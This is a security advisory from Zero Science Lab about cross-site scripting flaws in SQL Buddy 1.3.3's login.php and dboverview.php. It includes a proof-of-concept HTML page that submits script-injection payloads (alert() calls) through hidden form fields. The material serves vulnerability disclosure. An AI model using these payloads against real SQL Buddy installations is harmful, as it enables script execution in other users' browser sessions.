SQL Buddy 1.3.3 (GET/POST) Multiple Remote Cross-Site Scripting Vulnerabilities

2012-02-17 / 2012-02-18

Credit: Gjoko 'LiquidWorm' Krstic

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

<!--

SQL Buddy 1.3.3 (GET/POST) Multiple Remote Cross-Site Scripting Vulnerabilities


Vendor: Calvin Lough
Product web page: http://www.sqlbuddy.com
Affected version: 1.3.3

Summary: SQL Buddy is an open source web based MySQL administration application.

Desc: SQL Buddy suffers from a XSS vulnerability when parsing user input to the
'DATABASE', 'HOST' and 'USER' parameters via POST method in 'login.php', and the
'db' parameter in 'dboverview.php' via GET method. Attackers can exploit these
weaknesses to execute arbitrary HTML and script code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.9
           MySQL 5.5.20


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5074
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5074.php

CWE-79: http://cwe.mitre.org/data/definitions/79.html


13.02.2012

-->



<html>
<title>SQL Buddy 1.3.3 (GET/POST) Multiple Remote Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss(){document.forms["xss"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br /><br />
<form action="http://localhost/sqlbuddy/login.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="HOST" value='"><script>alert(1)</script>' />
<input type="hidden" name="USER" value='"><script>alert(2)</script>' />
<input type="hidden" name="DATABASE" value='"><script>alert(3)</script>' />
</form>
<!-- [post-auth (get)] -->
<form action="http://localhost/sqlbuddy/dboverview.php" method="GET" id="xss2">
<input type="hidden" name="db" value='1"><script>alert(1)</script>' />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>POST Method Exploit!</h3></font></b></a><br /><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>GET Method Exploit!</h3></font></b></a><br /><br />
<br /><br /><br /><br /><font color="gray">&copy; 2012.</font>
<a href="http://www.zeroscience.mk" target="_blank" style="text-decoration:none">
<font color="gray">Zero Science Lab</a></font></center>
</body></html>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5074.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SQL Buddy 1.3.3 (GET/POST) Multiple Remote Cross-Site Scripting Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.